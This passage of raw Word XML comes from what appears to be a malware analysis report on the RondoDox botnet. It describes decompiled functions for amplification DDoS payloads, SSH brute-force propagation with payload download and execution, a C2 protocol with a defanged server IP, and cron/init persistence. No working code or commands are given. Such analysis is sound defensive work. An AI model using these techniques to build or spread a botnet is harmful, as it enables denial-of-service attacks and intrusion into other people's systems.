        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSDP/UPnP payload (33 bytes) — UPnP M-SEARCH requests for SSDP amplification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00408760: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Large Amplification payload (1,356 bytes) — Oversized packet for memcached or CLDAP amplification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XorShift128 PRNG: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All payload and IP randomization uses a shared XorShift128 state machine (global state at DAT_0051f0a0 through DAT_0051f0ac). The PRNG is: state ^= state &lt;&lt; 11; state = (state &gt;&gt; 8) ^ state ^ old_state ^ (old_state &gt;&gt; 19). This provides fast, deterministic pseudo-randomness for high-throughput packet generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Brute-Force Propagation (FUN_00401430)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The most sophisticated attack function — combines SSH authentication with payload delivery:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates TCP socket with 60-second SO_RCVTIMEO timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connects to target on port 0x5000 (reversed byte order = port 80, but used as SSH)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Formats login commands using sprintf with credentials from param_2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads payload and validates ELF header (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">\x7fELF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) before execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Writes received data to file via FUN_00413828 (fwrite)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Handles HTTP response parsing (searches for "\r\n\r\n" header separator)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 SSH Propagation &amp; Self-Replication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00401800 implements SSH-based propagation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Executes shell commands via popen (FUN_00411F3A) with formatted command strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Captures output, searches for expected response patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051D9D0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051D9DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shell commands (likely wget/curl download + chmod + execute)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Falls back to alternative execution method if primary fails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 C2 Communication Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox C2 communication is built on custom TCP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 Server: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">45.92.1[.]50 (identified in static analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses raw TCP sockets with non-blocking I/O</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00400540 reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/%d/status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> files — used to check running processes and report system state to C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands parsed from C2 include target IP, port, duration, and attack type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bot reports results back via the same TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Persistence Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full Self-Installer (FUN_00404ea0) — CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full decompilation revealed the main installation and propagation routine (448 lines of decompiled code):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Decryption: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts file paths DAT_0051c6fd (11 bytes) and DAT_0051c708 (12 bytes) — likely binary installation paths — and sets permissions to 0x1ED (0755)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scans 3 directories (DAT_0051d9f0, 0x51da00, 0x51da19) for files, validates each as ELF binary via FUN_00401b10, collects up to 256 writable locations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Path Persistence Writer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Calls FUN_00402ed0 to write to 5 initial persistence paths (DAT_0051c810, 0x51c830, 0x51c7e1, 0x51c7f0, 0x51c850)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10+ Persistence Targets: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Writes to multiple system locations including:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c720</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Primary binary installation path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c740</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Init script path (likely /etc/init.d/...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c760</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Secondary init path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Cron persistence path (likely /etc/crontab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c780, 0x51c790</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Additional cron paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c7b4, 0x51c7d0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — System service paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c870</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Startup script path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051c882</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RC configuration (likely /etc/rc.local)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Opens each cron/init file, reads existing contents, checks for duplicates, and appends the persistence command using decrypted format strings (DAT_0051cf10, 0x51cf30, 0x51cec0, 0x51cee0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
